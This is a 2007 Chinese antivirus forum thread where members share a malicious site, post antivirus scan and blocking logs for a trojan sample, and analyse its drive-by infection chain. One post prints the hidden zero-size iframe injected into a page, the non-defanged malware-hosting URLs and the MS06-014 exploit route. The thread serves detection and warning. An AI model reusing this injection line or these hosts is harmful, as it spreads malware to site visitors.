转一个毒网

显示全部楼层 · 发表于 2007-3-26 16:36:07

hxxp://fei6yu.99star.net/

显示全部楼层 · 发表于 2007-3-26 16:40:12

样本~~

显示全部楼层 · 发表于 2007-3-26 16:41:39

Scan performed at: 2007-3-26 16:41:56
Scanning Log
NOD32 version 2144 (20070325) NT
Command line: C:\Documents and Settings\EQ2\桌面\~tmp6688.rar
Operating memory - is OK

Date: 26.3.2007 Time: 16:42:00
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\~tmp6688.rar
C:\Documents and Settings\EQ2\桌面\~tmp6688.rar ?RAR ?~tmp6688.exe - Win32/Pacex.Gen virus
Number of scanned files: 2
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 16:42:00 Total scanning time: 0 sec (00:00:00)

显示全部楼层 · 发表于 2007-3-26 16:42:04

Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\~tmp6688.rar'
C:\Documents and Settings\Administrator\桌面\~tmp6688.rar
  [0] Archive type: RAR
  --> ~tmp6688.exe
   [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
   [INFO]    A backup was created as '467487ff.qua'  ( QUARANTINE )
   [INFO]    The file was deleted!

显示全部楼层 · 发表于 2007-3-26 16:43:54

2007-3-26 1:41:47 已由访问保护规则禁止 MT-16D974393A12\wynn C:\Documents and Settings\wynn\My Documents\~tmp6688.exe C:\WINDOWS\system32\drivers\etc\hosts 通用标准保护:保护网络设置已阻止的操作: 写入
2007-3-26 1:41:49 已由访问保护规则禁止 MT-16D974393A12\wynn C:\Documents and Settings\wynn\My Documents\~tmp6688.exe C:\WINDOWS\uninstall\rundl132.exe 通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件已阻止的操作: 创建
2007-3-26 1:41:50 已由访问保护规则禁止 MT-16D974393A12\wynn C:\Documents and Settings\wynn\My Documents\~tmp6688.exe C:\WINDOWS\RichDll.dll 通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件已阻止的操作: 创建
2007-3-26 1:41:50 已由访问保护规则禁止 MT-16D974393A12\wynn C:\Documents and Settings\wynn\My Documents\~tmp6688.exe C:\WINDOWS\system32\drivers\etc\hosts 通用标准保护:保护网络设置已阻止的操作: 写入

显示全部楼层 · 发表于 2007-3-26 16:47:37

风暴胜者V2 测试版本(http://www.v0day.com)
_________您的安全是我们的责任_______________
载入病毒库…进行整理…分配内存…可以使用

===============================================
___________病毒查杀结果__________________

===============================================

2007年3月26日16时47分34秒开始查杀C:\Documents and Settings\Administrator\桌面\新建文件夹\~tmp6688
威胁性文件：C:\Documents and Settings\Administrator\桌面\新建文件夹\~tmp6688\~tmp6688.exe
=========================================

_________文件性质分析结果________________
"带壳"仅指文件性质,仅供专业人员分析使用。

-----------------------------------------

2007年3月26日16时47分35秒收起线程…100% 查杀完毕！
扫描文件：1查杀病毒：1

显示全部楼层 · 发表于 2007-3-26 16:57:11

AVAST毫不犹豫的查杀了

显示全部楼层 · 发表于 2007-3-26 18:19:00

和木蚂蚁昨天被挂的那个是一样的，同样指向于http://web.77276.com/0.htm这有毒网页，但这个网页居然更新了，在最后免加上了一句
<iframe src="http://web.77276.com/2.htm" width="0" height="0" frameborder="0"></iframe>

而http://web.77276.com/2.htm里面也是利用了ms06-014漏洞，挂的那个毒也是http://do.77276.com/0.exe，但这次是以~tmp+4位随机数字的名字（如：~tmp5246）下载到windows文件夹里面，并利用cmd来调用

[ 本帖最后由 dikex 于 2007-3-26 18:20 编辑 ]

显示全部楼层 · 发表于 2007-3-26 18:20:50

卡巴杀...
红伞杀...

显示全部楼层 · 发表于 2007-3-26 21:07:47

蜘蛛

转一个毒网

本帖子中包含更多资源

本帖子中包含更多资源